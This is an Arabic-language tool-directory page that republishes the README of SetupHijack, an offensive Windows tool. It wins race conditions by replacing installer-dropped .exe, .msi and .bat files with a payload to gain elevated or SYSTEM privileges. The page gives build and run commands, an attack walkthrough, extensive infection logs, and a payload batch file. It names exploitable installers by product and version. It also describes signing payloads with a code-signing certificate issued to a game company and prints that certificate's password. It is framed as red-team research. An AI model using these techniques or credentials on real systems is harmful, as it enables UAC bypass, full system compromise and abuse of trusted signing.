Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
SetupHijack — SetupHijack هي أداة بحث أمني تستغل حالات السباق والتعامل غير الآمن مع الملفات في عمليات تثبيت وتحديث تطبيقات ويندوز. | Kitploit
أدوات/GitHubGitHub/hackerhouse-opensource/setuphijack
تصعيد الامتيازاتتوليد الحمولةالاستغلالالحركة الجانبيةاختبار الاختراقالفريق الأحمر
GitHubhackerhouse-opensource/setuphijack

SetupHijack

SetupHijack هي أداة بحث أمني تستغل حالات السباق والتعامل غير الآمن مع الملفات في عمليات تثبيت وتحديث تطبيقات ويندوز.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
26429منذ 6 أشهرتمت المراجعة من قبل Kitploit

SetupHijack


نظرة عامة

SetupHijack هي أداة بحث أمني تستغل حالات السباق والتعامل غير الآمن مع الملفات في عمليات التثبيت والتحديث في نظام Windows. تستهدف السيناريوهات التي تُسقط فيها برامج التثبيت أو التحديث ذات الصلاحيات المرتفعة ملفات في %TEMP% أو مواقع أخرى قابلة للكتابة من الجميع، مما يسمح للمهاجم باستبدال هذه الملفات قبل تنفيذها بصلاحيات مرتفعة.

  • لا يتطلب صلاحيات مرتفعة للتشغيل.
  • لا يستخدم إشعارات نظام الملفات (بل يستقصي التغييرات بدلاً من ذلك).
  • يستغل نقاط الضعف في توقيع كود Authenticode ونماذج ثقة المثبّتين.
  • يمكنه إصابة ملفات .exe و.msi والملفات الدفعية (مثل sysinfo وnetstat وipconfig).
  • مصمم لاستخدام الفرق الحمراء واختبار الاختراق والبحث الأمني فقط.

الاستخدام المقصود لهذه الأداة هو التشغيل في الخلفية على حساب مستخدم مخترق يتمتع بصلاحيات، من أجل رفع صلاحيات عملية أخرى عبر اختطاف الملفات التي يُسقطها المثبّت أو المحدّث.

يوضح المخطط أدناه حالات استخدام واقعية لهذا الاستغلال في سيناريوهات متعددة يمكن استخدامها لتجاوز UAC. يُعتبر تجاوز UAC حدًا أمنيًا عند التشغيل في وضع Adminless، وهو "متطلب شائع للمهاجم" لتعطيل الضوابط الأمنية. استغلال عمليات المسؤول المتميز يوفر وصولًا استغلاليًا عامًا للكود الضار للتحميل الجانبي أو تصعيد صلاحيات العمليات. يمكن استخدام هذه الأداة لتحديد تطبيقات إضافية معرضة لنفس أنواع المخاطر، إذ يمكن للمهاجم انتظار تنفيذ هذه العمليات كوسيلة للحصول على صلاحيات مرتفعة دون تعطيل سلوكيات المستخدم.

مخطط اكتشاف الثغرات في SetupHijack

كيف يعمل

  1. SetupHijack يمسح %TEMP% (والمجلدات الفرعية) باستمرار بحثًا عن ملفات التثبيت الجديدة أو المعدّلة.
  2. عند اكتشاف ملف مستهدف، يتم استبداله بحمولة مقدمة من المستخدم (EXE أو MSI أو BAT)، مع الحفاظ اختياريًا على الملف الأصلي كملف .bak.
  3. إذا قامت العملية المتميزة بتنفيذ الملف المستبدل قبل فحوصات التكامل، فستعمل الحمولة بصلاحيات مرتفعة (مثل SYSTEM أو Administrator).
  4. تسجّل الأداة جميع الإجراءات وتحتفظ بقائمة تخطي (skiplist) لتجنب إعادة إصابة نفس الملفات.

ملاحظة حول توقيع الكود

يستخدم هذا المشروع عملية توقيع كود مخترقة مع SignToolEx.exe and SignToolExHook.dll لتوقيع الحمولات والمثبّتين. استخدام شهادات توقيع كود صالحة وطابع زمني Authenticode سيزيد من معدل نجاحك عند تجاوز فحوصات الثقة الخاصة بالمثبّت ونظام التشغيل.


الاستخدام

البناء```sh

nmake PAYLOAD=c:\Path\to\your\payload.exe

root@kitploit:~
### تشغيل (خيارات)```sh
SetupHijack.exe                  # Scan %TEMP%, %APPDATA%, and %USERPROFILE%\Downloads (default)
SetupHijack.exe -notemp          # Disable scanning %TEMP%
SetupHijack.exe -noappdata       # Disable scanning %APPDATA%
SetupHijack.exe -nodownloads     # Disable scanning %USERPROFILE%\Downloads
SetupHijack.exe clean            # Clean mode (restores .bak backups in all enabled locations)
SetupHijack.exe verbose          # Verbose mode (log all actions)
SetupHijack.exe <payload.exe>    # Use specified payload for .exe (unless argument is a recognized option)
  • شغّل SetupHijack.exe قبل أو أثناء عملية تثبيت/تحديث بصلاحيات مرتفعة.
  • افتراضيًا، تفحص الأداة جميع مواقع الإفلات الشائعة: %TEMP%، %APPDATA%، و%USERPROFILE%\Downloads.
  • يمكنك تعطيل أي موقع باستخدام العلامات -notemp أو -noappdata أو -nodownloads.
  • تعمل علامة clean على استعادة النسخ الاحتياطية في جميع المواقع الممكّنة. وتسجّل علامة verbose جميع الإجراءات.
  • لتصعيد الصلاحيات عن بُعد، استخدمها مع shadow.exe أو أدوات مشابهة في خدمات المحطة الطرفية.

مثال على مسار الهجوم

  1. قم ببناء الحمولة وأداة SetupHijack: ```sh nmake PAYLOAD=c:\Users\YourUser\Desktop\payload.exe
    root@kitploit:~
  2. ابدأ SetupHijack: ```sh SetupHijack.exe
    root@kitploit:~
  3. قم بتشغيل المثبّت المستهدف أو عملية التحديث كمسؤول.
  4. إذا قام المثبّت بإسقاط ملفات في %TEMP% ونفّذها بصلاحيات مرتفعة، فسيتم استبدال حمولتك وتشغيلها.

مثال على المخرجات

فيما يلي مثال حقيقي لبناء وتشغيل SetupHijack، بما في ذلك توقيع الكود ومخرجات الإصابة:``` C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>nmake PAYLOAD="C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe"

Microsoft (R) Program Maintenance Utility Version 14.29.30159.0 Copyright (C) Microsoft Corporation. All rights reserved.

root@kitploit:~
    powershell -Command "(Get-Content SetupHijack.cpp) -replace '#define PAYLOAD_PATH L\".*\"', '#define PAYLOAD_PATH L\"%ESCAPED_PAYLOAD%\"' | Set-Content SetupHijack.cpp"
    cl /nologo /W4 /EHsc /DUNICODE /D_UNICODE /MT /O2 /c SetupHijack.cpp

SetupHijack.cpp SetupHijack.cpp(318): warning C4189: 'hr2': local variable is initialized but not referenced taskkill /f /im SetupHijack.exe 2>nul powershell -Command "Start-Sleep -Milliseconds 500" link /nologo /SUBSYSTEM:CONSOLE /ENTRY:wmainCRTStartup /NODEFAULTLIB:MSVCRT /NODEFAULTLIB:MSVCPRT /OUT:SetupHijack.exe SetupHijack.obj kernel32.lib user32.lib shlwapi.lib Shell32.lib /MANIFEST /MANIFESTFILE:SetupHijack.exe.manifest copy /y install.wxs.template install.wxs 1 file(s) copied. powershell -Command "(Get-Content install.wxs) -replace 'Source="PAYLOAD_PLACEHOLDER"', 'Source="%ESCAPED_PAYLOAD%"' | Set-Content install.wxs" wix build install.wxs -o install.msi Generating install.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe Generating launch_payload.bat with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe powershell -Command "(Get-Content install.wxs) -replace '(<File Id="RengeExeFile" Source=").*?(" KeyPath="yes"/>)', '%ESCAPED_PAYLOAD%' | Set-Content install.wxs" call sign_random.bat Using CERT: [certs\rockstar1.pfx] Using PASS: [C!EZxYUxVGPzQDj3] The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: SetupHijack.exe

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0 The following certificate was selected: Issued to: Rockstar Games, Inc. Issued by: Entrust Code Signing CA - OVCS1 Expires: Thu Mar 20 17:16:13 3000 SHA1 hash: C9793F4A2E629D88F2213622D7A0C170D9C7CBC6

Done Adding Additional Store Successfully signed: install.msi

Number of files successfully Signed: 1 Number of warnings: 0 Number of errors: 0

C:\Users\Fantastic\Desktop\Sayuri\InfectElevatedSetups>SetupHijack.exe [2025-09-24 15:20:46] [SetupHijack] Using payload: C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe [2025-09-24 15:20:46] [SetupHijack] If infecting .msi, will use: install.msi [2025-09-24 15:20:46] [SetupHijack] Polling enabled locations recursively for .exe, .msi, .bat: [2025-09-24 15:20:46] - C:\Users\FANTAS1\AppData\Local\Temp [2025-09-24 15:20:46] - C:\Users\Fantastic\AppData\Roaming [2025-09-24 15:20:46] - C:\Users\Fantastic\Downloads [2025-09-24 15:20:46] [SetupHijack] Entering infection loop. [2025-09-24 15:20:59] [SetupHijack] Total infections this session: 0 [2025-09-24 15:21:13] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\installcmd.bat with payload install.bat, backup: C:\Users\FANTAS~1\AppData\Local\Temp\installcmd.bat.bak [2025-09-24 15:21:13] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:22] [SetupHijack] Replaced C:\Users\Fantastic\Downloads\installcmd.msi with payload install.msi, backup: C:\Users\Fantastic\Downloads\installcmd.msi.bak [2025-09-24 15:21:26] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:26] [SetupHijack] Total infections this session: 2 [2025-09-24 15:21:41] [SetupHijack] Replaced C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe with payload C:\USers\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\Fantastic\AppData\Roaming\InsecureApp\setup.exe.bak [2025-09-24 15:21:41] [SetupHijack] New infections this run: 1 [2025-09-24 15:21:53] [SetupHijack] Total infections this session: 3

root@kitploit:~
## مثال لاستخدام نشر أداة اختراق

فيما يلي لقطة شاشة توضح SetupHijack أثناء العمل، حيث ينشر أداة الاختراق أثناء تشغيل مُثبِّت بصلاحيات مرتفعة:

![مثال لاستخدام نشر أداة اختراق](https://assets.kitploit.com/production/public/readmes/42886/25e1c4b4b2ca8921509760ae8ddf420a66a13deaed03631c44de618dc668f218.png)

## ملاحظات أمنية

- هذه الأداة مخصصة للاختبار والبحث المصرح بهما فقط.
- استغلال هذه الثغرات يمكن أن يؤدي إلى اختراق كامل للنظام (SYSTEM) عندما يكون المستخدم في مجموعة المسؤولين (Administrator).
- قد تستخدم برامج التثبيت فحوصات التجزئة/التوقيع التي ستمنع هذا الهجوم، لكن الكثير منها ما زال لا يفعل ذلك.
- استخدم دائمًا في بيئة خاضعة للتحكم.
- إذا اكتشفت ثغرة CVE أو حصلت على مكافأة باستخدام هذه الأداة، فامنحنا الفضل!

استهداف دليل واحد (مثل `%TEMP%`) في كل مرة يمكن أن يزيد من احتمالية الفوز في أي حالة سباق من نوع time-of-creation/time-of-use (TOCTOU)، حيث يتيح استطلاعًا أسرع وتنافسًا أقل. لتحقيق أقصى موثوقية، قم بتشغيل مثيلات متعددة من SetupHijack، كل منها يركز على دليل واحد. للحصول على أفضل النتائج، تأكد من أن حمولتك (ملف EXE الذي تريد تشغيله بصلاحيات مرتفعة) يتضمن بيانًا يطلب رفع الصلاحيات (requireAdministrator)، وأنه موقّع بشهادة توقيع كود صالحة تتضمن طابعًا زمنيًا Authenticode. هذا يزيد من فرصة تجاوز فحوصات الثقة الخاصة ببرامج التثبيت ونظام التشغيل على برامج التثبيت.

## الثغرات المكتشفة

القائمة التالية غير الحصرية تم تحديدها مع "أفضل السيناريوهات" لتشغيل ملفات .MSI غير الموثوقة مما يؤدي إلى "NT AUTHORITY\SYSTEM" لكن العديد من عمليات "UAC المرتفعة" غالبًا ما تعمل عبر ملفات .bat. نظرًا لأن التنفيذ يحدث تحت نفس USER SID، حيث أن %TEMP% فريد لـ USER SID المبني ضمن %USERPROFILE% كجزء من إنشاء الجلسة الداخلية، يمكنك رفع الصلاحيات داخل أوامر نفس الجلسة إلى نزاهة عالية بصلاحيات كاملة من خلال التلاعب بملف .bat الذي يرث حقوق العملية الأصلية. "تنفيذ أوامر مرتفع عبر ملف مؤقت" هو اكتشاف شائع - ويمكن استخدامه لتجاوز UAC والتنفيذ بدون مسؤول كمستخدم، حيث يظهر موجه المستخدم على سطح المكتب الآمن التطبيق المستغل (مثل تحديث Zoom).

- يستخدم Zoom 6.6.1 (15968) مجلد %AppData% لتثبيت وتحديث ملفات .exe مما يسمح بحركة جانبية للعملية و
  انتحال العملية (مثل إرسال طلب رفع صلاحيات من تحديث Zoom). يمكن التلاعب بالملفات التنفيذية بسهولة
  لشن هجمات سرقة بيانات الاعتماد ولأغراض خبيثة.```
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\airhost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\aomhost64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptControl.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptHost.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptInstall.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\CptService.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zCrashReport64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomDocConverter.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomHybridConf.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookIMPlugin.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\ZoomOutlookMAPI\ZoomOutlookMAPI64.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\Zoom_launcher.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zTscoder.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zUpdater.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\bin\zWebview2Agent.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\uninstall\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
[2025-09-24 19:27:31] [SetupHijack] Infecting: C:\Users\Fantastic\AppData\Roaming\Zoom\ZoomDownload\Installer.exe with payload: c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe
  • عند تشغيل install.msi، يتم تنفيذ msiexec.exe تحت NT AUTHORITY\SYSTEM
  • يأتي ملف exe الخاص بتحديث Wireshark عبر %Temp%، ولم يفز بالسباق.
  • فحوصات توقيع الكود الخاصة بالتحديثات في Visual Studio تمنع الاستغلال، (تم اختباره بشكل خفيف .VSIX)
  • يمكن استغلال مثبّت Texas Instrument Code Composer لتجاوز مصادقة UAC 09/25/2025. (ccs_setup_20.3.0.00014.exe)``` [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7z.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\7za.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_monitor.bat.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\ccs_update_20.3.0.00014.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\certificates\install-certs.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\curl.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat with payload install.bat, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\signing\sign.bat.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\wget\wget.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 1 [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe.bak [2025-09-25 14:39:59] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe.bak [2025-09-25 14:39:59] [SetupHijack] New infections this run: 2 [2025-09-25 14:39:59] [SetupHijack] New infections this run: 5 [2025-09-25 14:40:02] [SetupHijack] Total infections this session: 13 [2025-09-25 14:40:29] [SetupHijack] Replaced C:\Users\FANTAS1\AppData\Local\Temp\tmp1758829228.bat.bak [2025-09-25 14:40:29] [SetupHijack] New infections this run: 1
root@kitploit:~
- لوحظ أن بيئة التطوير Cursor IDE تنشئ ملفات .bat وسجل أوامر في %TEMP% يمكن استغلالها لحقن
  أوامر في سجل Cursor، مع رفع صلاحيات محدود. 


- يحتوي JBL Quantum Engine على ثغرة حقن أوامر (تم إصلاحها الآن) تقوم بتشغيل "net" (بما في ذلك .bat) من
  نفس الدليل الذي يُنفَّذ منه JBL_QuantumENGINE_1.11.0.1511_x64. يستخدم الإصدار الأحدث مُثبِّتًا جديدًا
  غير معرَّض لهذه الثغرة المحددة لحقن الأوامر (JBL_QuantumENGINE_Installer_2.2.13_x64.exe). تم
  اكتشاف هذه المشكلة كثغرة 0day في نوفمبر 2022. يمكن استخدامها لتجاوز قيود UAC والحصول على 
  صلاحيات Administrator مرتفعة. تكتب خدمة SYSTEM ملفات bat في %TEMP% لأغراض التصحيح/التشخيص. ;-)```
C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>type net.bat
@echo off
REM install.bat - runs the payload for SetupHijack
start "" "c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe"

C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day>dir JBL_QuantumENGINE_1.11.0.1511_x64.exe
 Volume in drive C has no label.
 Volume Serial Number is 48EC-B703

 Directory of C:\Users\Fantastic\Desktop\Sayuri\JBL_and_WinAudioCore_0day

11/20/2022  11:54 AM       139,327,096 JBL_QuantumENGINE_1.11.0.1511_x64.exe
               1 File(s)    139,327,096 bytes
               0 Dir(s)  237,500,821,504 bytes free
  • EA Sports "EA Anti-Cheat Installer" تنفيذ أوامر بصلاحيات مرتفعة بشكل تعسفي. عناوين EA مثل "skate." ستقوم بتثبيت خدمة مكافحة الغش والتي تستخدم موقعًا مؤقتًا وقابلًا للكتابة من قبل المستخدم. يمكن للمهاجم استبدال ملف EAAntiCheat.Installer.exe أثناء تثبيت STEAM، وستظهر مطالبة رفع صلاحيات UAC من محرك STEAM، مع شعار Valve وأيقونتها، ولكنها ستنفذ ملف payload exe الخاص بك بصلاحيات مرتفعة. راجع لقطات شاشة EASkateUAC لاستخدامها في هجمات تجاوز UAC (التباس؟).``` Directory of C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat

09/29/2025 04:34 PM

. 09/29/2025 04:13 PM .. 09/29/2025 04:31 PM 166,999,232 EAAntiCheat.Installer.exe 1 File(s) 166,999,232 bytes 2 Dir(s) 161,991,856,128 bytes free

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>cacls EAAntiCheat.Installer.exe C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat\EAAntiCheat.Installer.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F WIN11LAB\Fantastic:(ID)F APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

C:\Program Files (x86)\Steam\steamapps\common\Skate__Installer\EAAntiCheat>copy c:\Users\Fantastic\Documents\Work\EA\launch_demo.exe EAAntiCheat.Installer.exe Overwrite EAAntiCheat.Installer.exe? (Yes/No/All): A 1 file(s) copied.

root@kitploit:~
# الرخصة

هذه الملفات متاحة بموجب رخصة BSD ثلاثية البنود.
تنزيل الأداة
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\unzip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\ccs_fe3a9075-a8c1-44c2-69a2-0d76d423353e\util\zip\zip.exe with payload c:\Users\Fantastic\Desktop\DEMO\Renge_x64.exe, backup: C:\Users\FANTAS
1\AppData\Local\Temp\tmp1758829228.bat with payload install.bat, backup: C:\Users\FANTAS